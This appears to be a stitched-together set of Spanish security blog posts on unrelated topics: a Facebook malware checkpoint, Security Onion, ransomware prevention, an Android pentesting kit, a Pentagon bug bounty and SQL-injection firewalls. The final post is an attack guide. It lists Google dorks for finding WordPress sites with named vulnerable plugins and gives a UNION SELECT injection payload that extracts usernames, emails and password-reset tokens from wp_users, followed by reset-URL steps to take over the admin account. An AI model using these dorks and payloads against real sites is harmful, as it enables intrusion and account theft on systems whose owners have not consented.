Cuando Facebook dice que tu computadora está infectada con malware

Hace un par de años Facebook anunció que comenzaría a trabajar con algunas empresas de antivirus para ayudar a las personas a proteger sus equipos. Desde entonces se encuentra en funcionamiento un sistema que al detectar una interacción sospechosa entre el equipo y Facebook se lanza una advertencia de seguridad.

El mensaje que aparece en la página web es similar al de la siguiente imagen, se trata de un checkpoint que no permite continuar hasta que el equipo se limpia:

Mensaje de Facebook: Your Computer Needs to Be Cleaned

En el paso siguiente Facebook ofrece la descarga una herramienta gratuita para que los usuarios la instalen y realicen un análisis en busca de malware. Incluso recomiendan utilizarla si ya se cuenta con otro antivirus instalado o algún programa similar.

Las empresas con las cuales trabajan son por ahora F-Secure, Trend Micro, Eset y Kaspersky:

Facebook de invita a descargar un antivirus

De acuerdo a una publicación realizada por el equipo de seguridad de Facebook en junio del año pasado, desde que lanzaron este sistema de protección han ayudado a limpiar más de 2 millones de computadoras que estaban infectadas mientras se conectaban a Facebook.

La iniciativa es buena dado que muchos malwares aprovechan las redes sociales para propagarse, ya sea robando los datos de acceso o instalándose de forma oculta en el navegador o el sistema. Y es así como algunas infecciones llegan a ser realmente muy virales al propagarse entre las personas conocidas.

El problema de estas notificaciones que muestra Facebook es que generan mucha desconfianza, de hecho estas capturas me las envió un amigo informático que no estaba del todo seguro si eran reales o no.

Se parecen mucho a un intento de engaño o ingeniería social similar al que utilizan los falsos antivirus para que las víctimas los terminen instalando. Incluso no sería extraño que los ciberdelincuentes emulen este formato de advertencias para infectar o engañar a los usuarios de Facebook con descargas falsas como los pay per install y cosas por el estilo.

Para evitar confusiones sería mejor que el propio Facebook ofreciera realizar un scan online o mejor aún que realice una redirección hacia una página de ayuda donde se explique mejor la situación, ya que toma por sorpresa a la mayoría de los usuarios.

Limpiando cookies y temporales para salir de este checkpoint:

En la computadora de mi amigo la advertencia de Facebook aparecía únicamente cuando intentaba acceder desde el navegador Chrome, desde Firefox o el dispositivo móvil se podía loguear sin problemas.

Su computadora además estaba limpia, no tenía extensiones sospechosas en el navegador y la herramienta que se descargó no detectó ningún problema. La solución al final fue sencilla, bastó con limpiar las cookies y archivos temporales del navegador para que todo volviera a la normalidad.

La advertencia se disparó entonces por algún archivo temporal que estaba en el navegador y Facebook lo clasificó como malware.

Sin embargo, su cuenta quedó con algunas funciones bloqueadas temporalmente, por ejemplo no puede enviar enlaces por chat desde ningún dispositivo apareciendo un mensaje que dice ‘Acción no disponible en este momento‘. Esta limitación debería de mantenerse solo por algunos días por cuestiones de seguridad y luego desaparecer.

SECURITY ONION: DISTRIBUCIÓN GNU/LINUX PARA ANÁLISIS DE RED

Muchas veces nos toca analizar el tráfico de red intercambiado entre una máquina e Internet, o incluso comprobar si un equipo tiene alguna variedad de malware que lleve a cabo actividad de red, ya sea para atacar a otras máquinas o para comunicarse con el C&C de una botnet.

En esas situaciones, o simplemente en un despliegue preventivo de sondas IDS, la distribución Linux opensource Security Onion,  de la que hablo en este post, puede servir de gran utilidad. 

Básicamente, incorpora de forma preinstalada, diversas herramientas ampliamente conocidas, un IDS comoSnort y/o Suricata (nos da a elegir qué herramienta deseamos usar), GUIs para monitorizar los eventos de forma automática (Squert, Sguil), herramientas específicas para análisis de PCAPs (Wireshark, NetworkMiner) y herramientas populares de análisis forense de red como (Bro o Xplico). De algunas de ellas hemos hablado ampliamente en SbD en vidas pasadas.

En muchas ocasiones, pensamos que puede resultarnos interesante montar y elegir qué herramientas queremos habilitar para nuestro despliegue de sondas, y generalmente cuando me preguntan o en diversas formaciones, recomiendo hacer siempre una instalación mínima e instalar las herramientas justas y necesarias para cada caso. 

Sin embargo, a veces la configuración de determinadas herramientas como Bro, o la integración con PF_RING, para entornos de grandes necesidades de tráfico, pueden resultar problemáticas, y se agradece tener un punto de partida desde el cuál empezar con varias herramientas ya integradas, pudiendo deshabilitar aquello que no nos interese, dejando el resto.

En estos casos, es cuando Security Onion me ha resultado de gran utilidad, puesto que en pocos minutos ya trae todo lo necesario y con un único wizard se configura la mayoría de los productos. 

Está basada en Ubuntu y viene con entorno gráfico, así como varias herramientas que se pueden gestionar vía web. 

Una de las herramientas más interesantes que trae es ELSA (Enterprise Log Search and Archive), que permite hacer la vida cómoda al analista, de forma gráfica, cuando tiene que interactuar con Bro.

Con esta solución, se puede llegar a hacer un buen NSM (o sistema de gestión de red) permitiendo configurar un nodo como servidor y el resto como sondas, de manera que se pueda consultar toda la información recopilada desde un mismo punto centralizado.   

Por buscarle una pega, en la última versión de Security Onion, han eliminado de la lista de herramientas una de las interfaces para Snort que más me gustan, que es Snorby. Aun así, supongo que puede seguirse instalando manualmente.

Y si ya tengo un despliegue de sondas hecho, pero me interesan algunas de Security Onion ¿Qué hago?

Bueno pues otra de las ventajas que tiene Security Onion, es que no es necesario que instales la distribución entera y partas de ella, sino que puedes incorporar únicamente los repositorios al sources.list de otra distribución basada en Debian/Ubuntu e instales aquellos paquetes que te interesan, o todos juntos.

Para el nuevo curso de Análisis Forense Digital en Profundidad que vamos a dar en Securízame, en el módulo I, en la parte en la que daré pautas sobre cómo construir un Laboratorio Forense, demostraré cómo incorporar y configurar las herramientas de Security Onion en una distribución específica para forense como es Caine, de la que ya hemos hablado en SbD.

Bajo estas líneas, os dejo una lista de videos de Security Onion, en el que hay un How-to de cómo hacer la instalación, configuración y parte de la operación. 

¿Conoces el ransomware o secuestro de dispositivos?

Los ciberdelincuentes cuentan con muchos modos diferentes de obtener dinero fácil a costa de los sufridos usuarios de las tecnologías actuales. Uno de ellos es el conocido como ransomware o secuestro virtual del dispositivo móvil o equipo informático y que presenta una elevada incidencia desde hace ya algún tiempo.

A través de algún programa malicioso que instalamos involuntariamente en nuestro dispositivo logran bloquearnos su uso e incluso llegan a cifrar toda su información de modo que no nos es posible recuperarla. A cambio de la solución técnica que nos libera del problema, los delincuentes nos piden dinero a modo de rescate pero además, el desembolso de este dinero no siempre supone la liberación del equipo, lo que implica incluso un timo por partida doble.

A través del estudio realizado a nuestros lectores comprobamos que este tipo de programa malicioso ha llegado ya a afectar a un gran volumen de usuarios.  El 11% de los encuestados ha llegado a ser víctima del ransomware lo que supone en números absolutos millones de personas que han visto bloqueado el uso de sus equipos y han puesto en peligro toda su información.

Seguramente no todos han llegado a pagar por su liberación, ya que en la mayoría de los casos existen medios más o menos complicados para solucionar el problema, pero seguro que son muchos los que ante la urgencia y el miedo a perder la información han decidido pagar. Además, en muchos casos, los delincuentes nos hacen creer que es la propia policía la que nos ha bloqueado el equipo por haber incurrido en algún delito en la Red, lo que hace que muchas personas decidan pagar porque realmente creen que se trata de algún tipo de sanción.

Pero lo realmente interesante del estudio es comprobar que más del 55 % de los usuarios ni conocen este tipo de amenaza ni han oído hablar de ella. El desconocimiento del riesgo es uno de los factores principales que utilizan los creadores de estos timos para aprovecharse de sus víctimas.

El solo hecho de conocer su existencia y el modo en que actúa no solo nos va a prevenir ante el riesgo de contraer la “infección”, sino que en el caso de padecerla, sabremos que nunca debemos pagar y que será conveniente buscar ayuda en Internet o confiar el equipo a algún experto.

¿Cómo prevenir el ransomware?

• El origen del problema siempre es la instalación inadvertida y silenciosa de un programa o aplicación malintencionada con los efectos dañinos descritos. Por tanto, debemos prestar mucha atención a lo que supone la descarga e instalación de cualquier archivo, aunque parezca inofensivo.
• La procedencia de ese archivo puede ser diversa. Puede llegarnos como adjunto en un correo electrónico normalmente de origen desconocido, puede proceder de alguna descarga en páginas de dudosa reputación, también en programas P2P o también como alguna aparente instalación necesaria en nuestro navegador para actualizarlo o cualquier otro pretexto.
• En el caso de teléfonos o tabletas, normalmente la infección se produce por permitir al teléfono instalar aplicaciones no oficiales o por instalar durante la navegación algún tipo de característica en el nevagador.
• Ante la facilidad con que se propaga este virus, uno de los mejores consejos que se pueden dar es realizar copias de seguridad periódicamente, porque la realidad es que en algunos casos nuestros archivos pueden verse afectados irreversiblemente.
• Es importante también mantener actualizados los sistemas operativos y resto de programas y aplicaciones. Los fabricantes incluyen mejoras de seguridad que no obtendremos si no actualizamos periódicamente.
• Un buen sistema de antivirus debidamente actualizado puede ser una importante medida de prevención.
• Nunca pagar el rescate, no debemos favorecer el desarrollo de esta amenaza, además, nunca estaremos seguros de si por medio del pago vamos a obtener la solución prometida.

Recuperación del equipo

Los virus capaces de secuestrar los equipos son muy variados y han evolucionado mucho con el tiempo. Además, según el sistema operativo del que se trate, actuará de un modo u otro.

En muchos casos, como en la mayoría de los que afectan a Windows, bastará conrestaurar el equipo a un estado anterior.

En el caso de Android la solución suele pasar por reiniciar el teléfono en modo seguro y desinstalar entonces la aplicación maliciosa.

No obstante, no es posible dar una “receta” válida para todos los casos y todos los tipos de dispositivos. Si nos vemos en esta desagradable situación, deberemos buscar información en Internet precisa para nuestro modelo o equipo y si no nos vemos capacitados, lo mejor es pedir ayuda alguien experto o confiarlo a algún servicio técnico.

Appie v3: un entorno portable para pentesting de Android

¿Tienes que hacer pentesting de Android y tu portátil del trabajo tiene menos memoria que un zx81 y encima es Güindous? Appie es un paquete de software que ha sido preconfigurado para funcionar en cualquier Windows como un entorno de pentesting de Android de tal forma que ya no necesitaremos usar una máquina virtual o tener un arranque dual. Es decir, tendremos todas las herramientas necesarias funcionando sin necesidad de hacer cambios en nuestro sistema y necesitaremos unos 1,5 gigas en lugar de los 10 aprox. de una VM, además de menos memoria RAM.

Es totalmente portátil y se puede llevar en una memoria USB o smartphone y, en definitiva, se trata de una respuesta única para todas las herramientas necesarias para la evaluación de seguridad de las aplicaciones y análisis forense y de malware en Android. 

Estas son las herramientas que se incluyen en la última versión 3:

• Android Debug Bridge
• Apktool
• AndroBugs Framework
• AndroGuard
• Androwarn
• Atom
• ByteCodeViewer
• Burp Suite
• Drozer
• dex2jar
• Eclipse IDE with Android Developer Tools
• Introspy-Analyzer
• Java Debugger
• jadx
• Jd-Gui
• Pidcat
• SQLite Database Browser
• SQLmap
• Volatility Framework
• Tiene instalado también Java Runtime Environment(JRE) y python, para ejecutar Appie incluso en instalaciones nuevas de Windows.
• Mozilla Firefox con algunos addons de seguridad.
• Casi todos los comandos UNIX como ls, cat, chmod, cp, find, git, unzip, mkdir, ssh, openssl, keytool, jarsigner y muchos otros.
• Viene también con aplicaciones vulnerables como Owasp GoatDroid Project  yInsecureBank-v2 para probar.

Más info en: https://manifestsecurity.com/appie/

pd. el logo que han puesto me recuerda muy mucho al de Arch Linux.

Hackea el pentágono y ganate una recompensa

Recientemente el Departamento de Defensa de los EE.UU. ha anunciado lo que llaman "el primer programa de recompensas de vulnerabilidades de la historia del gobierno federal", invitando a los hackers de todo el mundo a que pongan a prueba la seguridad de sus páginas web y redes.

El concurso es sólo para hackers "examinados", lo que significa que cualquier persona con la esperanza de encontrar vulnerabilidades en sus sistemas primero tendrá que pasar una comprobación de sus antecedentes. Luego, según comenta la Agencia (y por supuesto), los participantes podrán ganar dinero y reconocimiento por su trabajo.

El programa piloto está programado para comenzar en abril. Eso sí, los participantes empezarán a trabajar en un sistema predeterminado que no es parte de sus operaciones críticas.

De acuerdo con una lista publicada el Departamento de Defensa gestiona actualmente 488 sitios web que se dedican a todo, desde el 111th Attack Wing y otras unidades militares hasta el programa de reintegración Yellow Ribbon.

La iniciativa "Hackea el Pentágono" es el trabajo del Servicio de Defensa digital, una unidad del Departamento de Defensa, que fue lanzada el pasado otoño como parte del Servicio Digital de la Casa Blanca.

Según el director del DDS Chris Lynch, "Traer el mejor talento, la tecnología y los procesos del sector privado no sólo nos ayuda a ofrecer soluciones integrales y más seguridad para el Departamento de Defensa, sino que también nos ayuda a proteger mejor a nuestro país."

El verano pasado, la Oficina de Administración de Personal reveló que la información privada de más de 20 millones de trabajadores y otras personas del gobierno de Estados Unidos había sido robados en un fallo de seguridad masiva.

Hace casi tres años, el Pentágono dijo públicamente el gobierno de China ha llevado a cabo ataques cibernéticos contra el gobierno de EE.UU., citando los ataques a "numerosas redes de EE.UU. diplomáticos, económicos y de la industria de defensa".

Así que crear un programas bug bounty como otras empresas privadas, parece una buena idea...

Firewall para evitar técnicas “SQL injection”.

Firewall  para evitar técnicas “SQL injection”.


Además de auditar el código de las aplicaciones Web y realizar test de penetración, también se debería implementar un firewall de aplicación para evitar ataques con técnicas de SQL injection. En este post tratare de dos Firewalls de aplicación muy recomendables: SQLassie y GreenSQL.
GreenSQL.

Un cortafuegos diseñado para bases de datos MySQL. Su funcionamiento se basa en un proxy que evalúa los comandos SQL antes de enviarlos a la base de datos, utilizando una matriz que acumula ordenes y bloquea comandos administrativos como: DROP, CREATE … y así evitar un ataque de “SQL injection” a una base de datos MySQL.
El cortafuego GreenSQL se puede utilizar de las siguientes formas:




Modo simulación, se comporta como un sistema de detección de intrusos.
Modo IPS, se comporta como un sistema de prevención de intrusos, bloqueando los comandos peligrosos.
Modo de aprendizaje, utiliza un periodo de prueba para aprender los comandos que se suelen utilizar y los añade en una lista. Para después bloquear el resto de comandos que no están en la lista de aprendizaje.
Modo cortafuegos, bloquea los comandos desconocidos.
Este disponible bajo licencia GPL para las siguientes distribuciones: CentOS, openSUSE, Fedora, Ubuntu y Debian.

Más información y descarga de GreenSQL:
https://sourceforge.net/projects/greensql/

SQLassie.

Un firewall de aplicación, basado en un proxy entre servidor de base de datos y la aplicación web, analizando sentencias SQL en tiempo real, a medida que se envían desde la aplicación al servidor de base de datos. SQLassie analiza las consultas y busca acciones sospechosas, que son indicativos de los ataques de SQL injection. Estas acciones son luego analizados mediante filtrado bayesiano, para determinar la probabilidad de que una consulta contenga un ataque.

SQLassie determina que una consulta es un ataque, bloquea la ejecución de la consulta y responde a lasolicitud con un mensaje apropiado. Por ejemplo, si un atacante está intentando acceder a las credenciales de usuario, SQLassie respondería con un conjunto vacío, y la aplicación se limitaría a pensar que la consulta no produjo resultados. Tanto la aplicación como el atacante no se darán cuenta del bloqueo de la sentencia por parte de SQLassie.
Según sus desarrolladores SQLassie está fuertemente inspirado por GreenSQL. GreenSQL es una excelente idea teórica, pero en algunos casos la tasa de falsos positivos es alta. Por ejemplo, cadaconsulta que se genera por MediaWiki, incluye un comentario incorporado que explica su intención. GreenSQL bloquea todas las consultas con los comentarios, esto hace MediaWiki inutilizable con GreenSQL.

SQLassie actualmente sólo es compatible con MySQL. La instalación es fácil, sólo se debe configurarSSQLassie para conectarse al servidor de base de datos, iniciar SQLassie, y luego configurar las aplicaciones Web para conectarse a SQLassie, en lugar de directamente al servidor de base de datos.

Más información y descarga de SQLassie:
http://www.sqlassie.org/

hackear wordpress con google dorks.

Hola a tod@s

En modo de celebración que hemos terminado un certificado de "Power of searching" de google , el cual nosotros hemos usado para mejorar nuestras habilidades de google dorks.

Wordpress es sin duda el CMS más popular y usado por los usuarios de la blogosfera, por ello también es el más atacado debido a los miles de plugins y temas disponibles para WordPress.

Lo primero que se realiza es la parte de enumeración y como encontrar sitios que utilicen Wordpress y los plugins que utilizan.

Encontrar sitios con Wordpress:

• intext:"Proudly powered by WordPress. "
• intext:"Powered by WordPress. " 

Ver plugins instalados:

• inurl: /wordpress/wp-content/plugins/

Es hora de buscar algunas vulnerabilidades conocidas:

Listado de directorio

• "index of" inurl:wp-content/
• "inurl:"/wp-content/plugins/wp-shopping-cart/"

Una de base de datos

• "inurl:wp-content/plugins/wp-dbmanager/"

Wordpress theme Doraa XSS Vulnerability

• Themes by Bons.us

Wordpress theme Dosimple XSS Vulnerability

• "Theme by domainagan.com."

WordPress WP Symposium Plugin Cross Site Scripting

• "/wp-content/plugins/wp-symposium/"

WordPress mTheme-Unus Local File Inclusion

• ilnurl:/wp-content/themes/mTheme-Unus/

Wordpress Better-wp-security Plugin Remote Code Execution

• inurl:wp-content/plugins/better-wp-security

WordPress U-Design Theme 2.7.9 Cross Site Scripting

• inurl:/wp-theme/u-design/

 Wordpress Plugin easy-comment-uploads File Upload Vulendrability

• inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

WordPress Category and Page Icons File Upload

• index of "/wp-content/plugins/category-page-icons/"

 WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

• inurl:themes/parallelus-salutation/ OR inurl:themes/parallelus-salutation/framework/

WordPress Auto-ThickBox-Plus XSS Vulnerability

inurl:"/wp-content/plugins/auto-thickbox-plus/"

Wordpress "Js Support Ticket" File Upload Bypass Extensions

inurl:/js-support-ticket-controlpanel/

WordPress Appointment Booking Calendar 1.1.24 Escalation / XSS

Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

WordPress Appointment Booking Calendar 1.1.24 SQL Injection

• Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

Full Path Disclosure (FPD), usaremos la siguiente dork:

• inurl:"/wp-includes/

Wordpress Formcraft Plugin File Upload Vulnerability

• intext:"powered by formcraft", inurl:plugins/formcraft

Wordpress Smallbiz Themes Remote File Uploads Vulnerability

• inurl:wp-content/themes/smallbiz/palette/index.php

Wordpress clikstats plugin Open Redirect

• Dork: inurl:"/wp-content/plugins/clikstats/ck.php?"

Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:

• inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

Stored XSS: Versión 3.2.3, usamos la siguiente dork:

• inurl:/wp-content/plugins/count-per-day/notes.php

Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:

• inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php

SQL Injection: Wordpress HD Webplayer - Versión 1.1, usamos la siguiente dork:

• inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password. Con este obtendremos el user_login y user_email de la siguiente manera:

• /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Una vez obtenido el usuario o e-mail nos dirigimos a www.sitio-web.com/wp-admin y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail.

Presionar en "Get New Password" la cual el sitio web enviara un token, dicho token se almacena en la DB, por lo tanto se obtendrá dicho código de la siguiente manera:

• /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users

Obtenido el token, sólo faltaría restablecer la contraseña, para ello nos dirigimos al siguiente link:

http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario

Remplazamos el token  y usuario por lo datos que nos arroja la DB, por ejemplo:

http://www.sitio-web.com/wp-login.php?action=rp&key=JAr7W8letkza&login=admin

Por lo que lograremos la opción de restablecer la password fácil, fácil y con fundamento.